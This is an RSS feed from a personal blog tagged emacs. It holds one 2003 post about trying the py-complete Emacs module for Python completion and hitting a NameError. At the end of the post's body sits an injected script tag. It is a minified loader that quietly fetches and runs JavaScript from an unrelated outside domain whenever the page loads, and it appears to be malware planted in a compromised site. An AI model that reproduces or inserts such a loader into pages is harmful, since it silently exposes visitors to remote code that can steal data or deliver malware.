<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; emacs</title>
	<atom:link href="http://www.larsen-b.com/tags/emacs/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Emacs Python Completion</title>
		<link>http://www.larsen-b.com/Article/77.html</link>
		<comments>http://www.larsen-b.com/Article/77.html#comments</comments>
		<pubDate>Mon, 29 Dec 2003 13:03:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[emacs]]></category>
		<category><![CDATA[Python]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I always used Emacs for Python editing. And usually i use the &#8216;dabbrev-expansion&#8217; to use auto-complete feature. After a talk w/ Phil I discover http://www.python.org/cgi-bin/moinmoin/EmacsPythonCompletion (py-complete lisp module). This seems to be a cool stuff but i get the same &#8230; <a href="http://www.larsen-b.com/Article/77.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>I always used Emacs for Python editing. And usually i use the &#8216;dabbrev-expansion&#8217; to use auto-complete feature. After a talk w/ Phil I discover <a class="reference" href="http://www.python.org/cgi-bin/moinmoin/EmacsPythonCompletion">http://www.python.org/cgi-bin/moinmoin/EmacsPythonCompletion</a> (py-complete lisp module).</p>
<p>This seems to be a cool stuff but i get the same error as Phil:</p>
<blockquote>
<pre class="doctest-block">&gt;&gt;&gt; Traceback (most recent call last):
File "&lt;stdin&gt;", line 1, in ?
NameError: name '__py_complete_string' is not defined</pre>
</blockquote>
<p>So I need to look at this another day..<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/77.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
